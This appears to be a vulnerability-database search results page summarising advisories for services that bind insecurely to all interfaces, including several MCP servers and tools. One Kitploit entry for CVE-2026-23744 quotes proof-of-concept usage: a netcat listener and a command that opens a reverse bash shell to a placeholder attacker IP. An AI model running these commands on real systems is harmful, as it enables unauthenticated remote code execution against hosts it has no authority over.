Lucene search
+L

15 matches found

Kitploit
Kitploit
added 2026/09/16 3:46 p.m.6 views

CVE-2026-23744

CVE-2026-23744:@mcpjam/inspector 中的未认证远程代码执行漏洞 免责声明: 本仓库及相关脚本仅用于授权的安全评估、渗透测试、安全研究和教育分析。未经明确书面同意对系统进行测试是非法行为,且被严格禁止。作者不对本材料的误解或滥用承担任何责任。 漏洞概述 属性| 详情 ---|--- CVE ID| CVE-2026-23744 CVSS 评分| 9.8(严重) 漏洞类别| 关键功能缺少身份验证(CWE-306) 受影响包| @mcpjam/inspector = 1.4.3 默认绑定| 0.0.0.0(暴露于本地网络 / 互联网)...

9.8CVSS6.2AI score0.64842EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/16 3:18 p.m.5 views

CVE-2026-23744-POC

CVE-2026-23744 — MCPJam Inspector 未认证远程代码执行 MCPJam Inspector -i -p -m 反弹 Shell 示例 步骤 1 — 启动你的监听器: root@kitploit: nc -lvnp 4444 步骤 2 — 运行漏洞利用脚本: root@kitploit: bash python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash 载荷方法 如果目标上 busybox 不可用,请尝试其他方法: root@kitploit: bash python3...

9.8CVSS6.3AI score0.64842EPSS
SaveExploits41References1
Kitploit
Kitploit
added 2026/09/13 9:02 a.m.10 views

CVE-2025-11953-PoC

描述 Metro 开发服务器由 React Native Community CLI 启动,默认绑定到外部接口。该服务器暴露了一个存在操作系统命令注入漏洞的端点,这使得未经身份验证的网络攻击者可以向服务器发送 POST 请求并运行任意可执行文件。在 Windows 上,攻击者还可以使用完全受控的参数执行任意 shell 命令。 受影响版本 产品| 严重性| 受影响版本| 修复版本 ---|---|---|--- @react-native-community/cli| 严重 9.8| 4.8.0 - 20.0.0‑alpha.2| 20.0.0 用法 1. 安装依赖...

9.8CVSS8.3AI score0.9398EPSS
SaveExploits5
Cvelist
Cvelist
added 2026/07/28 9:05 a.m.40 views

CVE-2026-9680 MCP Server Exposure via Insecure Default Binding on alibabacloud-rds-openapi-mcp-server

Improper exposure of the MCP server in alibabacloud-rds-openapi-mcp-server allows remote attackers to invoke exposed MCP tools via network access to an MCP endpoint listening on all network interfaces by default...

5.8CVSS0.0024EPSS
SaveExploits0References1
CVE
CVE
added 2026/07/28 9:05 a.m.37 views

CVE-2026-9680

The CVE concerns alibabacloud-rds-openapi-mcp-server where an MCP endpoint bound to all network interfaces by default exposes MCP tools. Root cause: improper exposure caused by insecure default binding. Impact: remote attackers can access exposed MCP tools via network without authentication? The ...

5.8CVSS5.9AI score0.0024EPSS
SaveExploits0References1
OSV
OSV
added 2026/07/23 11:41 a.m.14 views

PYSEC-2026-3517 PraisonAI: Missing Authentication for Critical Function and Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in praisonai

Unauthenticated PraisonAI UI MCP connect endpoint executes attacker-chosen local commands Summary PraisonAI v4.6.48 exposes the PraisonAIUI MCP client management API through the default UI host apps without authentication. A remote unauthenticated client can send POST /api/mcp/connect with a...

9.8CVSS6.4AI score0.00644EPSS
SaveExploits0References5
CVE
CVE
added 2026/07/14 5:46 p.m.126 views

CVE-2026-45077

CVE-2026-45077 concerns Symfony’s server:log listener (part of Symfony\Bridge\Monolog) which binds to 0.0.0.0:9911 by default and processes each frame with unserialize(base64_decode($message)) without authentication or an allowed-classes allowlist. This permits any reachable host to submit attack...

8.6CVSS6.1AI score0.00666EPSS
SaveExploits0References6Affected Software1
OSV
OSV
added 2026/06/25 10:34 p.m.15 views

GO-2026-5401 Algernon: Auto-refresh SSE event server binds to all interfaces by default on Linux/macOS in github.com/xyproto/algernon

Algernon: Auto-refresh SSE event server binds to all interfaces by default on Linux/macOS in github.com/xyproto/algernon...

4.3CVSS5.8AI score0.00197EPSS
SaveExploits0References1
Positive Technologies
Positive Technologies
added 2026/06/19 12:00 a.m.27 views

PT-2026-61657

Name of the Vulnerable Software and Affected Versions Network-AI versions 5.0.0 through 5.12.1 Description The ApprovalInbox feature, located in lib/approval-inbox.ts, serves as the network interface for the human-in-the-loop Approval Gate used to authorize high-risk operations. The associated HT...

5.9CVSS5.6AI score0.00159EPSS
SaveExploits1References11
RedhatCVE
RedhatCVE
added 2026/06/05 7:29 p.m.30 views

CVE-2026-46430

Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort"", ":5553" resolves to ":5553"...

4.3CVSS5.5AI score0.00197EPSS
SaveExploits0References1
NVD
NVD
added 2026/05/26 5:16 p.m.22 views

CVE-2026-46430

Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort"", ":5553" resolves to ":5553"...

4.3CVSS0.00197EPSS
SaveExploits0References1
Vulnrichment
Vulnrichment
added 2026/05/26 4:41 p.m.13 views

CVE-2026-46430 Algernon: Auto-refresh SSE event server binds to all interfaces by default on Linux/macOS

Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort"", ":5553" resolves to ":5553"...

4.3CVSS5.8AI score0.00197EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/05/26 4:41 p.m.17 views

EUVD-2026-31869

Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort"", ":5553" resolves to ":5553"...

4.3CVSS5.8AI score0.00197EPSS
SaveExploits0References1
GithubExploit
GithubExploit
added 2026/04/10 5:52 a.m.182 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

exploit-CVE-2026-23744 MCPJam Inspector is a local-first devel...

9.8CVSS6.2AI score0.64842EPSS
SaveExploits41
CNNVD
CNNVD
added 2022/01/18 12:00 a.m.14 views

Red Hat Keycloak 授权问题漏洞

Red Hat Keycloak is a suite of software from Red Hat, Inc. that provides authentication and management capabilities for modern applications and services. A security vulnerability exists in Red Hat Keycloak that stems from the default ECP binding flow that allows bypassing other authentication...

6.8CVSS6.7AI score0.01087EPSS
SaveExploits0References10
Rows per page
Query Builder